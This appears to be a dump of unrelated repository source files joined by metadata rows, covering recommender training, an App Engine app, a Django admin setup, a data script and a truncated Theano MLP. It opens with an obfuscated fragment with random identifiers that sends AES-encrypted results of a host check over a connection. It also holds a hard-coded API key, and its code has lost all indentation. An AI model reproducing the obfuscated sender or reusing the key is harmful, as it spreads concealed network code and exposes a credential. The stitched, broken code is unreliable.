for qrqqddyTUbAjnJQRtVlznntxrnfRPNfEMFtLhPjvGCriLaArIRvwOeJDoXOoBFMO in wSmgHqNbxlhjmYkfuXOpKSVALUlXqUKcKjFoiffSXMzkvndyGIRRGTTDwOYMXxOY:
for VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf in fnBssnvoIUKLCqrvXnWtXyfwpWsSpQCmMBcjNZxgJVEkSJYtPUaTFlHMtcsUdHVl:
if tRsYRWWaNnZaIPzoNqTfiDoUwfvGpOTKwFhDGDpExXRZDZhKNDLtxoWgLliRpkPg == sLydzvVwtKjQXnnxDWNYaYYyOhGcfHBOSbusdTOYhRzqikyHmpQWbcCDhKTWzSNQ:
VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf = qrqqddyTUbAjnJQRtVlznntxrnfRPNfEMFtLhPjvGCriLaArIRvwOeJDoXOoBFMO
elif sLydzvVwtKjQXnnxDWNYaYYyOhGcfHBOSbusdTOYhRzqikyHmpQWbcCDhKTWzSNQ == VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf:
VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf = wSmgHqNbxlhjmYkfuXOpKSVALUlXqUKcKjFoiffSXMzkvndyGIRRGTTDwOYMXxOY
else:
sLydzvVwtKjQXnnxDWNYaYYyOhGcfHBOSbusdTOYhRzqikyHmpQWbcCDhKTWzSNQ = wSmgHqNbxlhjmYkfuXOpKSVALUlXqUKcKjFoiffSXMzkvndyGIRRGTTDwOYMXxOY
for VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf in qhPqsFlqdsGeXFXuPdZjgVVGlSJCMtwnmyBrOCABWKHHcrTPYESURVJiWnliyzPr:
fnBssnvoIUKLCqrvXnWtXyfwpWsSpQCmMBcjNZxgJVEkSJYtPUaTFlHMtcsUdHVl = VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = single_host(gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX)
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.send(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
if __name__ == '__main__':
gbuyNrHfZPYjBqdXlOqIFbQrYLLAFwkYcvtGpNDGMBipYhVmoZZRbbwcYBszIEpb = 'sBdRRpkOKJJYIgeTkLMkTjFuvYvzpYpqauxOfMHilEshiMZZMgyUYIzQszcyjQvX'
seikgwnzTHwHPwktHYrqMmlXUtYiicrqXQdEadtEymMyRPOeOZFlkqYVlcTWhaFe()
| [
"noreply@github.com"
] | noreply@github.com |
8dbbb798fd7d365ab6925e56271b3e38fd9151e3 | d229480fb037442bfc2d895e300fdab89d06e1f6 | /examples/train_cornac.py | 739d5ecca174fe68cffed861aa5a7481900cda49 | [] | no_license | anonymcodes/t-vbr | 939c8eebed4e6ecbe4e85b26b296b5e16bb0b445 | c8d37aee05de5060a98fac74421a28db0a7eaa4c | refs/heads/master | 2023-08-09T01:55:12.295567 | 2020-12-03T02:06:18 | 2020-12-03T02:06:18 | 264,423,776 | 2 | 0 | null | 2023-07-23T17:09:20 | 2020-05-16T11:40:02 | Python | UTF-8 | Python | false | false | 6,934 | py | import numpy as np
import pandas as pd
import pickle
import argparse
import json
import torch.optim as optim
from torch import Tensor
from torch.utils.data import DataLoader
import torch
import torch.nn as nn
import torch.optim as optim
from tqdm import tqdm
from livelossplot import PlotLosses
import GPUtil
import os
import sys
from datetime import datetime
sys.path.append("../")
import random
import cornac
from cornac.eval_methods.base_method import BaseMethod
base_string = "abcdefghijklmnopqrstuvwxyz"
from scipy.sparse import csr_matrix
from beta_rec.utils.monitor import Monitor
from beta_rec.utils.common_util import save_to_csv
from beta_rec.utils import data_util
from beta_rec.utils import logger
import beta_rec.utils.constants as Constants
from beta_rec.datasets import data_load
import beta_rec.utils.evaluation as eval_model
import beta_rec.utils.constants as Constants
from scipy.sparse import csr_matrix
import pandas as pd
def parse_args():
parser = argparse.ArgumentParser(description="Run cornac model..")
# If the following settings are specified with command line,
# these settings will be updated.
parser.add_argument(
"--config_file",
default="../configs/cornac_default.json",
nargs="?",
type=str,
help="Options are: tafeng, dunnhunmby and instacart",
)
parser.add_argument(
"--dataset",
nargs="?",
type=str,
help="Options are: tafeng, dunnhunmby and instacart",
)
parser.add_argument(
"--data_split",
nargs="?",
type=str,
help="Options are: leave_one_out and temporal",
)
parser.add_argument(
"--test_percent",
nargs="?",
type=float,
help="Options are: leave_one_out and temporal",
)
parser.add_argument(
"--root_dir", nargs="?", type=str, help="working directory",
)
parser.add_argument(
"--toy", nargs="?", type=int, help="working directory",
)
return parser.parse_args()
"""
update hyperparameters from command line
"""
def update_args(config, args):
# print(vars(args))
for k, v in vars(args).items():
if v != None:
config[k] = v
print("Received parameters form comand line:", k, v)
def my_eval(eval_data_df, model):
u_indices = eval_data_df[Constants.DEFAULT_USER_COL].to_numpy()
i_indices = eval_data_df[Constants.DEFAULT_ITEM_COL].to_numpy()
r_preds = np.fromiter(
(
model.score(user_idx, item_idx).item()
for user_idx, item_idx in zip(u_indices, i_indices)
),
dtype=np.float,
count=len(u_indices),
)
pred_df = pd.DataFrame(
{
Constants.DEFAULT_USER_COL: u_indices,
Constants.DEFAULT_ITEM_COL: i_indices,
Constants.DEFAULT_PREDICTION_COL: r_preds,
}
)
result_dic = {}
TOP_K = [5, 10, 20]
if type(TOP_K) != list:
TOP_K = [TOP_K]
if 10 not in TOP_K:
TOP_K.append(10)
metrics = ["ndcg_at_k", "precision_at_k", "recall_at_k", "map_at_k"]
for k in TOP_K:
for metric in metrics:
eval_metric = getattr(eval_model, metric)
result = eval_metric(eval_data_df, pred_df, k=k)
result_dic[metric + "@" + str(k)] = result
result_dic.update(config)
result_df = pd.DataFrame(result_dic, index=[0])
save_to_csv(result_df, config["result_file"])
if __name__ == "__main__":
# load config file from json
config = {}
args = parse_args()
update_args(config, args)
with open(config["config_file"]) as config_params:
print("loading config file", config["config_file"])
json_config = json.load(config_params)
json_config.update(config)
config = json_config
root_dir = config["root_dir"]
time_str = datetime.now().strftime("%Y%m%d_%H%M%S")
log_file = (
root_dir
+ "logs/cornac"
+ "_"
+ config["dataset"]
+ "_"
+ config["data_split"]
+ time_str
)
config["result_file"] = (
root_dir
+ "results/cornac"
+ "_"
+ config["dataset"]
+ "_"
+ config["data_split"]
+ ".csv"
)
"""
init logger
"""
logger.init_std_logger(log_file)
# cornac.eval_methods.base_method.rating_eval = rating_eval
# Load the built-in MovieLens 100K dataset (will be downloaded if not cached):
# Here we are comparing Biased MF, PMF, and BPR:
# pop = cornac.models.most_pop.recom_most_pop.MostPop(name="MostPop")
# mf = cornac.models.MF(
# k=10, max_iter=25, learning_rate=0.01, lambda_reg=0.02, use_bias=True, seed=123
# )
# pmf = cornac.models.PMF(
# k=10, max_iter=100, learning_rate=0.001, lambda_reg=0.001, seed=123
# )
# bpr = cornac.models.BPR(
# k=10, max_iter=200, learning_rate=0.001, lambda_reg=0.01, seed=123
# )
# vaecf = cornac.models.vaecf.recom_vaecf.VAECF(
# name="VAECF",
# k=10,
# autoencoder_structure=[20],
# act_fn="tanh",
# likelihood="mult",
# n_epochs=100,
# batch_size=100,
# learning_rate=0.001,
# beta=1.0,
# trainable=True,
# verbose=False,
# seed=None,
# use_gpu=True,
# )
# nmf = cornac.models.NMF(
# k=15,
# max_iter=50,
# learning_rate=0.005,
# lambda_u=0.06,
# lambda_v=0.06,
# lambda_bu=0.02,
# lambda_bi=0.02,
# use_bias=False,
# verbose=True,
# seed=123,
# )
neumf = cornac.models.ncf.recom_neumf.NeuMF(
name="NCF",
num_factors=8,
layers=(32, 16, 8),
act_fn="relu",
reg_mf=0.0,
reg_layers=(0.0, 0.0, 0.0, 0.0),
num_epochs=20,
batch_size=256,
num_neg=4,
lr=0.001,
learner="adam",
early_stopping=None,
trainable=True,
verbose=True,
seed=None,
)
# models = [pop, mf, pmf, bpr, vaecf, nmf, neumf]
models = [neumf]
# add our own eval
data = data_util.Dataset(config)
num_users = data.n_users
num_items = data.n_items
uid_map = data.user2id
iid_map = data.item2id
train_uir_tuple = [
data.train["col_user"].to_numpy(),
data.train["col_item"].to_numpy(),
data.train["col_rating"].to_numpy(),
]
train_data = cornac.data.Dataset(
num_users,
num_items,
uid_map,
iid_map,
train_uir_tuple,
timestamps=None,
seed=None,
)
test_df_li = data.test
for model in models:
config["model"] = str(model.__class__).split(".")[-1].replace(">", "").strip(
"'\""
) + datetime.now().strftime("_%Y%m%d_%H%M%S")
model.fit(train_data)
my_eval(test_df_li[0], model) | [
"your@email.com"
] | your@email.com |
90a2e90e2f2334cf65ff1b339145a6612a911fa6 | a7360f3dcb53ff1280941315a1afa555b4710c15 | /main.py | 7b334989a8aa43e4520006e668e47589438e2bb1 | [] | no_license | ONEKINGDOMS/personalZeng | 6e96f4fdfc6bace17305dcfc775851f6041221ca | 0ec09467de3b97079f8895f247cb24e15bd880c0 | refs/heads/master | 2021-01-23T16:23:12.980854 | 2017-06-04T07:20:59 | 2017-06-04T07:20:59 | 93,296,625 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,823 | py | # -*- coding:utf8 -*-
import os
import urllib
import re
import urllib2
import jinja2
import webapp2
from google.appengine.api import users
from google.appengine.ext import blobstore
from google.appengine.ext import ndb
from google.appengine.ext.webapp import blobstore_handlers
from google.appengine.ext.webapp.util import run_wsgi_app
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
DEFAULT_CATEGORY = 'all'
API_KEY = "AIzaSyAB9unkt1cak3vRY0_WEmf4UYrYzrHohKM"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
QUERY_TERM = "dog"
class Products(ndb.Model):
name = ndb.StringProperty(indexed=False)
content = ndb.StringProperty(indexed=False)
date = ndb.DateTimeProperty(auto_now_add=True)
exchange = ndb.StringProperty(indexed=False)
price = ndb.StringProperty(indexed=False)
connactway = ndb.StringProperty(indexed=False)
image = ndb.StringProperty(indexed=False)
category = ndb.StringProperty(indexed=True)
blob_key = ndb.BlobKeyProperty()
class MainPage(webapp2.RequestHandler):
def get(self):
template = JINJA_ENVIRONMENT.get_template('index.html')
self.response.write(template.render())
class ResumePage(webapp2.RequestHandler):
def get(self):
template = JINJA_ENVIRONMENT.get_template('resume.html')
self.response.write(template.render())
class DemoPage(webapp2.RequestHandler):
def get(self):
temple = JINJA_ENVIRONMENT.get_template('demo.html')
self.response.write(temple.render())
class Demoweather(webapp2.RequestHandler):
def get(self):
temple = JINJA_ENVIRONMENT.get_template('weather.html')
self.response.write(temple.render())
class PhotoUploadFormHandler(webapp2.RequestHandler):
def get(self):
upload_url = blobstore.create_upload_url('/upload_photo')
category = self.request.get('category', DEFAULT_CATEGORY)
products_query = Products.query(Products.category == category)
products = products_query.fetch(10)
template_values = {
'products': products,
'category': urllib.quote_plus(category),
'upload_url':upload_url,
}
template = JINJA_ENVIRONMENT.get_template('product.html')
self.response.write(template.render(template_values))
class PhotoUploadHandler(blobstore_handlers.BlobstoreUploadHandler):
def post(self):
try:
category = self.request.get('category')
upload = self.get_uploads()[0]
product = Products(blob_key=upload.key())
product.category = self.request.get('category')
product.name = self.request.get('name')
product.content = self.request.get('content')
product.exchange = self.request.get('exchange')
product.price = self.request.get('price')
product.connactway = self.request.get('connactway')
product.put()
except:
self.error(500)
finally:
query_params = {'category': category}
self.redirect('/goodchange?' + urllib.urlencode(query_params))
class ViewPhotoHandler(blobstore_handlers.BlobstoreDownloadHandler):
def get(self, photo_key):
if not blobstore.get(photo_key):
self.error(404)
else:
self.send_blob(photo_key)
class SearchResult(webapp2.RequestHandler):
def get(self):
videos =[]
template_values = { 'videos': videos}
self.response.headers['Content-type'] = 'text/html'
template = JINJA_ENVIRONMENT.get_template('video.html')
self.response.write(template.render(template_values))
# def post(self):
# title=self.request.get('title')
# search=urllib.quote_plus(title.encode("utf-8"))
# req = urllib2.Request("https://www.youtube.com/results?search_query="+search)
# res = urllib2.urlopen(req)
# data = res.read()
# reg = r'data-context-item-id="([a-zA-Z0-9].+?)"'
# videopatten = re.compile(reg)
# videos = re.findall(videopatten,data)
# video=[videos[0]]
# res.close()
# template_values = { 'videos': video}
# self.response.headers['Content-type'] = 'text/html'
# template = JINJA_ENVIRONMENT.get_template('video.html')
# self.response.write(template.render(template_values))
app = webapp2.WSGIApplication([('/', MainPage),
('/goodchange', PhotoUploadFormHandler), ('/demo', DemoPage), ('/weather', Demoweather),
('/upload_photo', PhotoUploadHandler), ('/view_photo/([^/]+)?', ViewPhotoHandler),('/search', SearchResult), ('/resume', ResumePage), ('/video', SearchResult),
], debug=True)
| [
"zenghongbin@zengdeMacBook-Pro.local"
] | zenghongbin@zengdeMacBook-Pro.local |
cf69051dcb9cad2c69de1b1e9becca99eb7e3308 | 37e29d87d1d620488e9969203f213aa9ee13ef7f | /tkm/load_data.py | ee5eb10cbd92642269e1f68239f7227b119061eb | [] | no_license | koji0000/machine-learning | 296aea642ab9a025fc9d9064a0f50b9d259a7812 | 4201765fff8ca75944511c90dbe2a6821160c0b9 | refs/heads/master | 2021-07-24T02:50:06.543463 | 2017-11-02T01:18:36 | 2017-11-02T01:18:36 | 109,202,230 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | import pandas as pd
from logging import getLogger
TRAIN_DATA = '../input/train.csv'
TEST_DATA = '../input/test.csv'
logger = getLogger(__name__)
def read_csv(path):
logger.debug('enter')
df = pd.read_csv(path)
logger.debug('exit')
return df
def load_train_data():
logger.debug('enter')
df = read_csv(TRAIN_DATA)
logger.debug('exit')
return df
def load_test_data():
logger.debug('enter')
df = read_csv(TEST_DATA)
logger.debug('exit')
return df
if __name__ == '__main__':
print(load_train_data().head())
print(load_test_data().head()) | [
"nakashima@key-p.co.jp"
] | nakashima@key-p.co.jp |
905a7dce0baf7bd4ecf6823a6c1680a0a082533b | 7cb17f5819682463351593c54a00cfc2baccf562 | /main.py | acbc35421d9e6dce6cde2f4487fa53677553d1ee | [] | no_license | meganjacob/Overtime-Data-Analysis | 3fc91f36ea4aa3bc8ac33058f826927a998e80f9 | 91e9b8f527704674e226e06ff993574730a85d1e | refs/heads/master | 2022-06-18T00:42:24.141717 | 2020-05-05T22:46:23 | 2020-05-05T22:46:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | import csv
import matplotlib.pyplot as plt
hqs = []
ot = []
st = []
with open ('set.csv') as d:
data = csv.DictReader(d)
for i in data:
h = i['Headquarter']
otf = float(i['Total OT\nHours'])
stf = float(i['ST\nHours'])
if h in hqs:
index = hqs.index(h)
ot[index] += otf
st[index] += stf
else:
hqs.append(i['Headquarter'])
ot.append(otf)
st.append(stf)
continue
new = zip(ot, st)
percent = []
for (o,s) in new:
try:
t = round((o/s)*100, 2)
except ZeroDivisionError:
t = 0
percent.append(t)
for i in range(len(hqs)):
print("{}: {}%".format(hqs[i], percent[i]))
plt.bar(hqs, percent)
plt.savefig("graph.png") | [
"meganjacob2004@yahoo.com"
] | meganjacob2004@yahoo.com |
24bd01eef13ac27c129556df9c4bdd7e0d6ad861 | 44b869c9ddcfd8afa429a6a4758c6acdac62f9c1 | /users/admin.py | c13af5a0c2a73efaf7790a0cc239c9c99a1fafdc | [] | no_license | paulitstep/blog-api | 7507394eb008c6c1bd30e5699bb33e9e37cfac52 | 5ce6d84495fa9b6d32b38d7d99412858ff3bc077 | refs/heads/main | 2023-04-06T12:56:00.364861 | 2021-04-16T09:28:09 | 2021-04-16T09:28:09 | 357,801,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from users.models import NewUser
class UserAdminConfig(UserAdmin):
model = NewUser
search_fields = ('email', 'user_name',)
list_filter = ('email', 'user_name', 'is_staff', 'is_active')
list_display = ('email', 'id', 'user_name', 'is_staff', 'is_active')
ordering = ('-start_date',)
fieldsets = (
(None, {'fields': ('email', 'user_name',)}),
('Permissions', {'fields': ('is_staff', 'is_active',)}),
('Personal', {'fields': ('about',)}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'user_name', 'password1', 'password2', 'is_staff', 'is_active'), }),
)
admin.site.register(NewUser, UserAdminConfig)
| [
"pasha-mo1@rambler.ru"
] | pasha-mo1@rambler.ru |
715abf20cea7f39f6f659e1cdcea9383ed413dc0 | 621aff67f5f89e04029ea326d09681fcf46290a2 | /CodingBatLogic-1/cigar_party.py | 79bcd7e857eda41041650777f605226f7f13fa96 | [] | no_license | raymondng1893/Python-CodingBatExercises | 6a24e7ea2f63b54e43eb3727eee35d1077d64d77 | 252588ddf6267f6dd82d56d0e7ac79c779f0dcbb | refs/heads/master | 2021-09-07T21:57:45.838250 | 2018-03-01T17:38:40 | 2018-03-01T17:38:40 | 109,044,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | # When squirrels get together for a party, they like to have cigars. A squirrel party is successful when the number of cigars is between 40 and 60, inclusive. Unless it is the weekend, in which case there is no upper bound on the number of cigars. Return True if the party with the given values is successful, or False otherwise.
def cigar_party(cigars, is_weekend):
if is_weekend and cigars >= 40:
return True
elif not is_weekend and 40 <= cigars <= 60:
return True
return False
print(cigar_party(30, False))
print(cigar_party(50, False))
print(cigar_party(70, True))
| [
"noreply@github.com"
] | noreply@github.com |
7a3fcd2835b9f9190930f94600a4aafaaaa3423b | 128e2652e2f0a4b4be57894bffab461c90170657 | /tej_python/basics/files/seek.py | 656f78a1ef2076688bbeb29b34170fdcee8bf41b | [] | no_license | tejadeep/Python_files | ec2695ec844e723d0784a67bd13c9a178c0aa601 | 43fde84dd62543e5ed9896177949cca877fdb858 | refs/heads/master | 2020-06-11T04:35:55.850108 | 2019-08-08T07:23:23 | 2019-08-08T07:23:23 | 193,851,082 | 0 | 0 | null | 2019-06-26T07:19:34 | 2019-06-26T07:19:34 | null | UTF-8 | Python | false | false | 52 | py | f=open("text","r")
f.seek(5,1)
a=f.read()
print (a)
| [
"you@example.com"
] | you@example.com |
3d0360c9581dcb36b488f9b5f81209c664b1dda8 | 42644e989c58ba6eb217dfbf1368ed25e403e3c5 | /creditmlp.py | 121a511b119da25e5df7af25f218f5cdfc092a32 | [] | no_license | brian1760/Project | d96977fa3176767f163680d0737daea2c754fc5b | 0c0b45977f8838131505bda4795fbc3b4817cfe2 | refs/heads/master | 2021-01-17T20:57:20.166516 | 2016-07-19T15:10:57 | 2016-07-19T15:10:57 | 63,683,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,546 | py | """
This tutorial introduces the multilayer perceptron using Theano.
A multilayer perceptron is a logistic regressor where
instead of feeding the input to the logistic regression you insert a
intermediate layer, called the hidden layer, that has a nonlinear
activation function (usually tanh or sigmoid) . One can use many such
hidden layers making the architecture deep. The tutorial will also tackle
the problem of MNIST digit classification.
.. math::
f(x) = G( b^{(2)} + W^{(2)}( s( b^{(1)} + W^{(1)} x))),
References:
- textbooks: "Pattern Recognition and Machine Learning" -
Christopher M. Bishop, section 5
"""
__docformat__ = 'restructedtext en'
import os
import sys
import timeit
import csv
import numpy
from sklearn.metrics import confusion_matrix
import theano
import theano.tensor as T
import pandas as pd
import cPickle
#import pylab as pl
from credit_sgd import LogisticRegression, load_data
from process_credit_data import *
# start-snippet-1
class HiddenLayer(object):
def __init__(self, rng, input, n_in, n_out, W=None, b=None,
activation=T.tanh):
"""
Typical hidden layer of a MLP: units are fully-connected and have
sigmoidal activation function. Weight matrix W is of shape (n_in,n_out)
and the bias vector b is of shape (n_out,).
NOTE : The nonlinearity used here is tanh
Hidden unit activation is given by: tanh(dot(input,W) + b)
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.dmatrix
:param input: a symbolic tensor of shape (n_examples, n_in)
:type n_in: int
:param n_in: dimensionality of input
:type n_out: int
:param n_out: number of hidden units
:type activation: theano.Op or function
:param activation: Non linearity to be applied in the hidden
layer
"""
self.input = input
# end-snippet-1
# `W` is initialized with `W_values` which is uniformely sampled
# from sqrt(-6./(n_in+n_hidden)) and sqrt(6./(n_in+n_hidden))
# for tanh activation function
# the output of uniform if converted using asarray to dtype
# theano.config.floatX so that the code is runable on GPU
# Note : optimal initialization of weights is dependent on the
# activation function used (among other things).
# For example, results presented in [Xavier10] suggest that you
# should use 4 times larger initial weights for sigmoid
# compared to tanh
# We have no info for other function, so we use the same as
# tanh.
if W is None:
W_values = numpy.asarray(
rng.uniform(
low=-numpy.sqrt(6. / (n_in + n_out)),
high=numpy.sqrt(6. / (n_in + n_out)),
size=(n_in, n_out)
),
dtype=theano.config.floatX
)
if activation == theano.tensor.nnet.sigmoid:
W_values *= 4
W = theano.shared(value=W_values, name='W', borrow=True)
if b is None:
b_values = numpy.zeros((n_out,), dtype=theano.config.floatX)
b = theano.shared(value=b_values, name='b', borrow=True)
self.W = W
self.b = b
lin_output = T.dot(input, self.W) + self.b
self.output = (
lin_output if activation is None
else activation(lin_output)
)
# parameters of the model
self.params = [self.W, self.b]
# start-snippet-2
class MLP(object):
"""Multi-Layer Perceptron Class
A multilayer perceptron is a feedforward artificial neural network model
that has one layer or more of hidden units and nonlinear activations.
Intermediate layers usually have as activation function tanh or the
sigmoid function (defined here by a ``HiddenLayer`` class) while the
top layer is a softmax layer (defined here by a ``LogisticRegression``
class).
"""
def __init__(self, rng, input, n_in, n_hidden, n_out):
"""Initialize the parameters for the multilayer perceptron
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.TensorType
:param input: symbolic variable that describes the input of the
architecture (one minibatch)
:type n_in: int
:param n_in: number of input units, the dimension of the space in
which the datapoints lie
:type n_hidden: int
:param n_hidden: number of hidden units
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
"""
# Since we are dealing with a one hidden layer MLP, this will translate
# into a HiddenLayer with a tanh activation function connected to the
# LogisticRegression layer; the activation function can be replaced by
# sigmoid or any other nonlinear function
self.hiddenLayer = HiddenLayer(
rng=rng,
input=input,
n_in=n_in,
n_out=n_hidden,
activation=T.tanh
)
# The logistic regression layer gets as input the hidden units
# of the hidden layer
self.logRegressionLayer = LogisticRegression(
input=self.hiddenLayer.output,
n_in=n_hidden,
n_out=n_out
)
# end-snippet-2 start-snippet-3
# L1 norm ; one regularization option is to enforce L1 norm to
# be small
self.L1 = (
abs(self.hiddenLayer.W).sum()
+ abs(self.logRegressionLayer.W).sum()
)
# square of L2 norm ; one regularization option is to enforce
# square of L2 norm to be small
self.L2_sqr = (
(self.hiddenLayer.W ** 2).sum()
+ (self.logRegressionLayer.W ** 2).sum()
)
# negative log likelihood of the MLP is given by the negative
# log likelihood of the output of the model, computed in the
# logistic regression layer
self.negative_log_likelihood = (
self.logRegressionLayer.negative_log_likelihood
)
# same holds for the function computing the number of errors
self.errors = self.logRegressionLayer.errors
# the parameters of the model are the parameters of the two layer it is
# made out of
self.params = self.hiddenLayer.params + self.logRegressionLayer.params
# end-snippet-3
# keep track of model input
self.input = input
def __getstate__(self):
return (self.logRegressionLayer, self.hiddenLayer, self.input)
def __setstate__(self, state):
logRegressionLayer, hiddenLayer, input = state
self.logRegressionLayer = logRegressionLayer
self.hiddenLayer = hiddenLayer
self.input = input
def test_mlp(learning_rate=0.01, L1_reg=0.00, L2_reg=0.0001, n_epochs=10000, #batch size from 20 to 100
dataset='../data/mnist.pkl.gz', batch_size=80, n_hidden=90): # n_hidden altered from 20 to 90
"""
Demonstrate stochastic gradient descent optimization for a multilayer
perceptron
This is demonstrated on MNIST.
:type learning_rate: float
:param learning_rate: learning rate used (factor for the stochastic
gradient
:type L1_reg: float
:param L1_reg: L1-norm's weight when added to the cost (see
regularization)
:type L2_reg: float
:param L2_reg: L2-norm's weight when added to the cost (see
regularization)
:type n_epochs: int
:param n_epochs: maximal number of epochs to run the optimizer
:type dataset: string
:param dataset: the path of the MNIST dataset file from
http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz
"""
datasets = load_data(dataset)
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size
n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size
######################
# BUILD ACTUAL MODEL #
######################
print '... building the model'
# allocate symbolic variables for the data
index = T.lscalar() # index to a [mini]batch
x = T.matrix('x') # the data is presented as rasterized images
y = T.ivector('y') # the labels are presented as 1D vector of
# [int] labels
rng = numpy.random.RandomState(1234)
# construct the MLP class
classifier = MLP(
rng=rng,
input=x,
n_in=23, # altered from 4 to 23
n_hidden=n_hidden,
n_out=2 # altered from 3 to 2
)
# start-snippet-4
# the cost we minimize during training is the negative log likelihood of
# the model plus the regularization terms (L1 and L2); cost is expressed
# here symbolically
cost = (
classifier.negative_log_likelihood(y)
+ L1_reg * classifier.L1
+ L2_reg * classifier.L2_sqr
)
# end-snippet-4
# compiling a Theano function that computes the mistakes that are made
# by the model on a minibatch
test_model = theano.function(
inputs=[index],
outputs=classifier.errors(y),
givens={
x: test_set_x[index * batch_size:(index + 1) * batch_size],
y: test_set_y[index * batch_size:(index + 1) * batch_size]
}
)
validate_model = theano.function(
inputs=[index],
outputs=classifier.errors(y),
givens={
x: valid_set_x[index * batch_size:(index + 1) * batch_size],
y: valid_set_y[index * batch_size:(index + 1) * batch_size]
}
)
# start-snippet-5
# compute the gradient of cost with respect to theta (sotred in params)
# the resulting gradients will be stored in a list gparams
gparams = [T.grad(cost, param) for param in classifier.params]
# specify how to update the parameters of the model as a list of
# (variable, update expression) pairs
# given two lists of the same length, A = [a1, a2, a3, a4] and
# B = [b1, b2, b3, b4], zip generates a list C of same size, where each
# element is a pair formed from the two lists :
# C = [(a1, b1), (a2, b2), (a3, b3), (a4, b4)]
updates = [
(param, param - learning_rate * gparam)
for param, gparam in zip(classifier.params, gparams)
]
# compiling a Theano function `train_model` that returns the cost, but
# in the same time updates the parameter of the model based on the rules
# defined in `updates`
train_model = theano.function(
inputs=[index],
outputs=cost,
updates=updates,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]
}
)
# end-snippet-5
###############
# TRAIN MODEL #
###############
print '... training'
# early-stopping parameters
patience = 10000 # look as this many examples regardless
patience_increase = 2 # wait this much longer when a new best is
# found
improvement_threshold = 0.995 # a relative improvement of this much is
# considered significant
validation_frequency = min(n_train_batches, patience / 2)
# go through this many
# minibatche before checking the network
# on the validation set; in this case we
# check every epoch
best_validation_loss = numpy.inf
best_iter = 0
test_score = 0.
start_time = timeit.default_timer()
epoch = 0
done_looping = False
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
for minibatch_index in xrange(n_train_batches):
minibatch_avg_cost = train_model(minibatch_index)
# iteration number
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = [validate_model(i) for i
in xrange(n_valid_batches)]
this_validation_loss = numpy.mean(validation_losses)
print(
'epoch %i, minibatch %i/%i, validation error %f %%' %
(
epoch,
minibatch_index + 1,
n_train_batches,
this_validation_loss * 100.
)
)
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
#improve patience if loss improvement is good enough
if (
this_validation_loss < best_validation_loss *
improvement_threshold
):
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
best_iter = iter
# test it on the test set
test_losses = [test_model(i) for i
in xrange(n_test_batches)]
test_score = numpy.mean(test_losses)
print((' epoch %i, minibatch %i/%i, test error of '
'best model %f %%') %
(epoch, minibatch_index + 1, n_train_batches,
test_score * 100.))
if patience <= iter:
done_looping = True
break
end_time = timeit.default_timer()
print(('Optimization complete. Best validation score of %f %% '
'obtained at iteration %i, with test performance %f %%') %
(best_validation_loss * 100., best_iter + 1, test_score * 100.))
print >> sys.stderr, ('The code for file ' +
os.path.split(__file__)[1] +
' ran for %.2fm' % ((end_time - start_time) / 60.))
# save the model
with open('mlp_model.pkl', 'w') as f:
cPickle.dump(classifier, f)
# Function to calculate the success rate of the classifier predictions
correct =0
xs=test_set_x.eval()
ys=test_set_y.eval()
test_function=theano.function(inputs=[x],outputs=classifier.logRegressionLayer.y_pred)
for idx, vector in enumerate(xs):
i=numpy.ndarray((1,23),buffer=vector)
prediction=test_function(i)[0]
print('prediction',prediction)
if prediction==ys[idx]:
print('actual',ys[idx])
correct=correct+1
successRate=str(float(correct)/len(ys))
print('Success Rate :',successRate)
#Function to return the actual classification, and the classifier from the model
y_true=[]
y_pred=[]
difference=[]
xs = test_set_x.eval()
ys = test_set_y.eval()
test_functionConfuse=theano.function(inputs=[x],outputs=classifier.logRegressionLayer.y_pred)
for idx, vector in enumerate(xs):
